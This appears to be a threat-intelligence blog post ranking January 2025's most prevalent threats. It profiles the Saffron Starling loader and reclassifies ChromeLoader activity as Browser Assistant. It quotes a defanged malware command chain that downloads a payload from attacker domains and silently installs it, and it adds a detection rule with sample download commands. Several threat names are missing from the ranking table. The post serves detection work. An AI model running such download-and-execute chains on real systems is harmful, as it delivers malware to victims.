Highlights from January
Making its debut at number 1 on our top 10 most prevalent threat list this month is Infrared Ibis, Red Canary’s name for a cluster of compromised Chrome extensions containing malicious code designed to steal cookies. In December 2024, Cyberhaven disclosed a compromise of version 24.10.4 of their Chrome extension. Following the initial disclosure, researchers quickly uncovered several additional Chrome extensions similarly compromised with the same malicious code, dating as far back as May 2024. Red Canary tracks activity related to these Chrome extensions under the name “Infrared Ibis.”
Our other newcomer to the top 10 is Saffron Starling, tied for 8th with NetSupport Manager. Saffron Starling is Red Canary’s name for a cluster of activity that downloads and delivers malicious payloads like Danabot, Darkgate, and Matanbuchus. We first started tracking it in October 2023, and since that time it has been consistently active, albeit at low enough levels to keep it out of the top 10 until January 2025. This recent increase in activity comes after a four-month hiatus that began in August 2024. You can read more about Saffron Starling below.
A note on ChromeLoader
Part of the intel team’s work is continually researching the threats we see, and sometimes that research leads to reassessments. In June 2024, we saw activity that we decided was best tracked as a new ChromeLoader campaign, based on overlaps with public reporting at the time. That decision kicked off ChromeLoader’s recent six-month stint at number 1 on our list.
However, after additional research and file analysis, we now assess this activity is better tracked as a variation of Browser Assistant. You can read more about this change in our assessment below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for January 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| ⬆ 1 | Infrared Ibis | Red Canary's name for a cluster of compromised Chrome extensions containing malicious code designed to steal cookies |
| ➡ 2 | | Collection of Python classes to construct/manipulate network protocols |
| ⬆ 3 | | Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| ⬇ 4* | | Red Canary's name for a cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
| ⬆ 4* | | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| ⬆ 4* | | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| ⬆ 7 | | Open source tool that dumps credentials using various techniques |
| ⬇ 8* | NetSupport Manager | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| ⬆ 8* | Saffron Starling | Cluster of activity that downloads additional malicious payloads such as Danabot and DarkGate |
| ⬆ 10* | | Red Canary's name for a suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper |
| ⬆ 10* | | Malware loader that uses DLL side-loading to deliver additional payloads through process injection |
| ⬇ 10* | | Penetration testing framework used to probe systematic vulnerabilities on networks and servers to conduct post-exploitation activity on compromised hosts |
| ⬇ 10* | | Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging |
| ⬆ 10* | | Red Canary's name for an activity cluster using a worm spread by external drives that leverages Windows Installer to download malicious files |
⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Scripting Saffron Starling
In September 2023, Red Canary observed a loader that we (and others) had up to that point referred to as the Danabot loader delivering a new payload, DarkGate. That change led us to track the loader as its own distinct threat that we named Saffron Starling. We weren’t the only team who noticed the activity in late 2023, as seen in reports from different researchers. In December 2023, Mandiant published a report sharing details of activity dropping Danabot and DarkGate that they called PAPERDROP/PAPERTEAR that has significant overlaps with the VBScript version of Saffron Starling.
Key features of Saffron Starling include:
- A .zip archive containing a script file like .vbs or .js
- Windows Scripting Host (`wscript.exe`) executing that script with a command like:
  `"Wscript.exe" "C:\Users\username\Downloads\q-report-60033.zip\q-report-60033.js"`
- The script file contents vary depending on the type of script being used, but will typically be obfuscated in some way.
- That script launches `cmd.exe` or PowerShell to execute a command that reaches out to a remote resource to pull down the next stage payload.
Here is an example similar to what we’ve seen, from the VT sample .js file linked above:
```text
"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\user\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\user\Documents\QMQjaBdqIo.pdf" hxxps://bologna.sunproject[.]dev/download/pdf & "C:\Users\user\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://rome.sunproject[.]dev/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
```
Observed payloads so far at Red Canary include Danabot, DarkGate, and Matanbuchus.
There are several benefits of tracking Saffron Starling as a separate threat from its payload. At Red Canary we frequently detect malicious activity early enough in its execution chain that we don’t necessarily see the payload. Tracking the loader allows us to monitor its activity even without payload execution or as the payload changes. Additionally, it helps us determine which behaviors are earliest in that execution chain, leading to better detection coverage of the threat. For example, Saffron Starling uses PowerShell to download and execute its payloads, which gives us a detection opportunity before payload execution.
Detection opportunity: Script launching PowerShell to download and execute a payload
The following pseudo-detection analytic will identify `wscript`, `cscript`, or `mshta` launching PowerShell to download and execute a payload. Threats like Saffron Starling abuse the `Invoke-WebRequest` cmdlet to download and launch malicious code. Note that this cmdlet can be used legitimately for maintenance tasks and device administration, so you may need to investigate further to determine if the activity is evil. Child processes and file modifications in suspicious directories can be signs of successful payload execution.
```text
parent_process == (wscript.exe, cscript.exe, mshta.exe)
&&
process == (cmd.exe, powershell.exe)
&&
command_includes ("invoke-webrequest")
```
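As an added example (not code from the post or from Red Canary), here is the analytic above implemented in Python and run over constructed process-start events. It goes slightly beyond the post's analytic by also matching PowerShell's built-in `iwr` alias of `Invoke-WebRequest`, and the `ProcessEvent` field names are assumptions about what the telemetry carries.

```python
import ntpath
import re
from dataclasses import dataclass

# Process names from the post's pseudo-analytic.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Invoke-WebRequest plus its built-in alias "iwr" (the alias is an addition
# to the post's analytic); case-insensitive, as PowerShell itself is.
DOWNLOAD_CMDLET = re.compile(r"invoke-webrequest|\biwr\b", re.IGNORECASE)

@dataclass(frozen=True)
class ProcessEvent:  # minimal process-start event; field names are assumptions
    parent_image: str
    image: str
    command_line: str

def _basename(image: str) -> str:
    # Telemetry usually carries full paths; compare on the file name only.
    return ntpath.basename(image).lower()

def matches_analytic(ev: ProcessEvent) -> bool:
    """parent is a script host AND process is a shell AND cmdline downloads."""
    return (
        _basename(ev.parent_image) in SCRIPT_HOSTS
        and _basename(ev.image) in SHELLS
        and DOWNLOAD_CMDLET.search(ev.command_line) is not None
    )

def find_matches(events):
    return [ev for ev in events if matches_analytic(ev)]

# Constructed sample events (not real telemetry); URLs are defanged placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # wscript spawning PowerShell to fetch a payload: match.
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS,
                 r'powershell -w hidden -c "Invoke-WebRequest hxxp://example.invalid/agent -OutFile $env:TEMP\a.msi"'),
    # mshta spawning cmd that uses the alias: match.
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c powershell iwr hxxp://example.invalid/pdf -OutFile report.pdf"),
    # Same cmdlet from an admin's console (parent explorer.exe): no match.
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell Invoke-WebRequest https://updates.example.invalid/p.msi -OutFile p.msi"),
    # cscript spawning cmd with no download at all: no match.
    ProcessEvent(r"C:\Windows\System32\cscript.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c echo done"),
]
```

The third event shows why the post says further investigation is needed: the same cmdlet from an interactive admin session is excluded only because of its parent, so tuning should focus on the parent/child pairing rather than the cmdlet string alone.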
Reassessing ChromeLoader detections
The Red Canary Intel team has recently reassessed how we track activity we previously labeled as ChromeLoader. In June 2024, Red Canary and third-party researchers observed activity that bore similarities to ChromeLoader, but was not quite the same. We chose at that time to track the activity as ChromeLoader, even as we began to wrestle with the possibility that it might be better tracked as something else.
At the end of the year, with ChromeLoader poised to be our number one threat for 2024, we dug in again to see what we could learn. The result of that research and analysis led us to the conclusion that what we tracked as a new ChromeLoader campaign was better tracked as a new variation of Browser Assistant.
Browser Assistant is a browser extension file offered by Realistic Media that claims to improve browser performance for Firefox and Chrome. It is frequently referred to as adware and/or a potentially unwanted program (PUP). While it’s considered to be “just” adware, the 2024 activity has several distinct differences when compared to traditional Browser Assistant:
- It attempts to masquerade as a PDF-themed download
- It installs itself in suspiciously named directories
- Occasionally it has a signing certificate that is registered to a different organization than the traditional “Realistic Media”
Even with these differences, we assess with high confidence that it has enough similarities to Browser Assistant to still categorize it as such, including:
- The same file structure
- The same obfuscator
- Signing certificate overlaps with traditional Browser Assistant
Because Browser Assistant has been historically categorized as a PUP, it currently does not meet our threshold for inclusion in this top 10 list. PUPs tend to be vastly more prevalent and are typically lower risk than more malicious types of threats, which is why Browser Assistant and others are not represented in this ranking.